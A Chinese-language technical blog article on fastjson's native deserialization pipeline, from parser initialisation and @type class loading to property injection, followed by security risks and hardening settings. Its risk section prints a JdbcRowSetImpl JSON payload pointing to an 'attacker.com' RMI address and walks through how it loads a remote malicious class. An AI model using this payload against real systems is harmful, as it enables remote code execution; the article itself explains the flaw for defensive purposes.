news 2026/2/18 12:52:25

fastjson 原生反序列化的底层原理和执行流程

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
fastjson 原生反序列化的底层原理和执行流程

一、fastjson 反序列化核心概念

首先明确基础定义:

  • 反序列化:将 JSON 字符串转换为 Java 对象的过程,fastjson 作为高性能 JSON 库,其反序列化核心是「基于字节码生成 + 反射」的混合实现。
  • 原生反序列化:指 fastjson 默认的反序列化方式(非ParserConfig.getGlobalInstance().setSafeMode(true)等安全模式),支持完整的类加载、属性注入和方法调用。

二、fastjson 原生反序列化核心流程

fastjson 反序列化的完整执行链路可分为 5 个核心步骤,我用流程图+文字拆解:

输入JSON字符串
JSON解析器初始化
语法解析与Token提取
类加载与实例化
属性注入与方法调用
返回最终Java对象
步骤1:JSON解析器初始化

fastjson 会创建DefaultJSONParser对象,核心参数包括:

  • JSON 字符串的字符数组
  • 配置类ParserConfig(决定是否允许加载自定义类、是否开启安全模式等)
  • 特征配置Feature(如是否允许单引号、是否忽略未知属性等)

核心代码示例:

// 手动初始化解析器(fastjson底层调用逻辑)Stringjson="{\"@type\":\"com.example.User\",\"name\":\"test\"}";ParserConfigconfig=ParserConfig.getGlobalInstance();// 默认全局配置DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.Default);
步骤2:语法解析与Token提取

DefaultJSONParser通过Lexer对 JSON 字符串进行词法分析,将字符串拆分为 Token(如{}@type、字符串值、数字值等),核心逻辑:

  1. 识别 JSON 结构(对象/数组/基本类型);
  2. 提取关键标识:尤其是@type字段(fastjson 反序列化的核心入口,指定要实例化的类名);
  3. 校验 JSON 语法合法性(如括号匹配、引号闭合等)。
步骤3:类加载与实例化

这是反序列化的核心环节,fastjson 会根据@type指定的类名(或默认类)完成类加载和对象创建:

  1. 类加载:通过ParserConfigcheckAutoType方法校验类名(原生模式下默认允许大部分类),然后通过Class.forName加载类;
  2. 对象实例化
    • 优先调用类的无参构造方法(如果没有无参构造且未指定 Creator,会抛出异常);
    • 支持通过@JSONCreator注解指定有参构造/静态工厂方法;
    • 对于集合/数组等容器类,会创建对应的空容器对象。

核心代码(简化版):

// 类加载逻辑(ParserConfig核心方法)publicClass<?>checkAutoType(StringtypeName,Class<?>expectClass,intfeatures){// 原生模式下跳过大部分安全校验Class<?>clazz=Class.forName(typeName,true,Thread.currentThread().getContextClassLoader());returnclazz;}// 对象实例化(JavaBeanDeserializer)publicObjectcreateInstance(DefaultJSONParserparser,Typetype){// 优先找无参构造Constructor<?>constructor=clazz.getDeclaredConstructor();constructor.setAccessible(true);returnconstructor.newInstance();}
步骤4:属性注入与方法调用

实例化对象后,fastjson 会遍历 JSON 中的键值对,完成属性赋值,核心逻辑:

  1. 属性匹配:将 JSON 的 key 与 Java 类的字段名/setter 方法匹配(支持驼峰/下划线自动转换);
  2. 类型转换:将 JSON 中的字符串/数字等值转换为 Java 字段的类型(如 String → Integer、JSON 对象 → 嵌套 Java 对象);
  3. 赋值方式
    • 优先调用setXxx()方法(符合 JavaBean 规范);
    • 如果没有 setter,直接通过反射设置字段值(field.setAccessible(true));
  4. 特殊方法调用
    • 对于实现java.io.Externalizable的类,会调用readExternal方法;
    • 对于自定义反序列化器(ObjectDeserializer),会调用其deserialze方法。
步骤5:返回最终对象

完成所有属性注入后,将实例化并赋值完成的 Java 对象返回,反序列化流程结束。

三、fastjson 反序列化关键组件

组件名作用
DefaultJSONParser核心解析器,负责 JSON 词法/语法分析
ParserConfig反序列化配置中心,控制类加载、自动类型检测、反序列化器注册等
JavaBeanDeserializer默认的 JavaBean 反序列化器,处理普通类的实例化和属性注入
Lexer词法分析器,将 JSON 字符串拆分为 Token
ObjectDeserializer反序列化器接口,自定义类可实现该接口定制反序列化逻辑

四、原生反序列化的核心风险(深度剖析重点)

fastjson 原生反序列化的最大问题在于@type字段的滥用,核心风险点:

  1. 任意类加载:原生模式下checkAutoType校验宽松,攻击者可通过@type指定危险类(如com.sun.rowset.JdbcRowSetImpl);
  2. 反射执行恶意代码:危险类实例化后,其属性注入过程会触发敏感方法(如JdbcRowSetImplsetDataSourceName会触发 JNDI 调用,进而加载远程恶意类);
  3. 无参构造触发风险:部分危险类的无参构造方法本身就会执行敏感逻辑(如文件写入、命令执行)。

典型恶意 JSON 示例:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://attacker.com/malicious.class","autoCommit":true}

执行流程:

  1. 加载JdbcRowSetImpl类 → 实例化(无参构造);
  2. 注入dataSourceName属性(调用setDataSourceName);
  3. 注入autoCommit属性(调用setAutoCommit,内部触发connect方法,访问 RMI 服务器加载恶意类);
  4. 恶意类执行命令,完成攻击。

五、fastjson 反序列化优化/安全配置

为了规避风险,实际使用中需调整配置:

  1. 开启安全模式:
    ParserConfig.getGlobalInstance().setSafeMode(true);
  2. 白名单控制:
    ParserConfigconfig=newParserConfig();config.addAccept("com.example.");// 只允许反序列化指定包下的类
  3. 禁用@type字段:
    DefaultJSONParserparser=newDefaultJSONParser(json,config,Feature.DisableSpecialKeyDetect);

总结

  1. fastjson 原生反序列化核心是「解析 JSON → 加载类 → 实例化对象 → 反射注入属性」,依赖ParserConfig控制类加载规则;
  2. @type字段是反序列化的核心入口,也是安全风险的主要来源,原生模式下校验宽松易导致任意代码执行;
  3. 生产环境必须开启安全模式/白名单,禁用不必要的@type解析,避免反序列化漏洞。
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/8 14:38:05

利刃与坚盾:Tomcat漏洞全景解析(原理+实战+前瞻防御)

Tomcat作为全球使用率超60%的Java Web中间件&#xff0c;承载着海量企业级应用的核心服务。其漏洞多集中于文件处理、协议实现、权限配置、反序列化四大核心模块&#xff0c;在云原生、微服务等复杂部署场景下&#xff0c;漏洞利用门槛持续降低&#xff0c;已成为网络攻击的高频…

作者头像 李华
网站建设 2026/2/6 22:52:05

LangFlow能否支持Protobuf序列化?高效数据传输

LangFlow 能否支持 Protobuf 序列化&#xff1f;高效数据传输的工程实践 在构建现代 AI 工作流系统时&#xff0c;我们常常面临一个看似“次要”却影响深远的问题&#xff1a;组件之间的数据怎么传得更快、更稳、更通用&#xff1f; 以 LangFlow 为例&#xff0c;这款基于 Lang…

作者头像 李华
网站建设 2026/2/8 8:07:50

LangFlow中的故障恢复机制:断点续执行能力探讨

LangFlow中的故障恢复机制&#xff1a;断点续执行能力探讨 在构建复杂的AI应用时&#xff0c;一个令人头疼的现实是&#xff1a;哪怕只是修改了提示词中的一个标点&#xff0c;整个工作流也得从头跑一遍。尤其是当流程中包含调用GPT-4这类耗时又昂贵的API时&#xff0c;这种“全…

作者头像 李华
网站建设 2026/2/8 6:24:47

Open-AutoGLM识别准确率提升80%?:关键错误处理技巧全公开

第一章&#xff1a;Open-AutoGLM控件识别错误处理概述在自动化测试与智能UI交互场景中&#xff0c;Open-AutoGLM作为基于大语言模型的控件识别框架&#xff0c;能够解析界面语义并生成操作指令。然而&#xff0c;由于界面动态性、布局变异或OCR识别偏差&#xff0c;控件识别错误…

作者头像 李华
网站建设 2026/2/16 6:20:17

华为OD机试真题精讲:计算误码率(Python/Java/C++多语言实现)

华为OD机试真题精讲:计算误码率(Python/Java/C++多语言实现) 一、题目描述(2025B卷高频100分题) 在通信系统中,误码率(BER, Bit Error Rate)是衡量数据传输质量的核心指标,定义为接收的二进制数据中错误位数与有效数据位数的比值。 题目要求 给定发送的二进制字符…

作者头像 李华
网站建设 2026/2/14 19:11:28

Open-AutoGLM服务启动超时?:资深架构师教你4种高概率命中解法

第一章&#xff1a;Open-AutoGLM服务启动超时问题的背景与影响在现代自动化机器学习&#xff08;AutoML&#xff09;系统中&#xff0c;Open-AutoGLM作为一款支持大规模图神经网络训练与推理的服务框架&#xff0c;广泛应用于推荐系统、知识图谱构建等关键场景。然而&#xff0…

作者头像 李华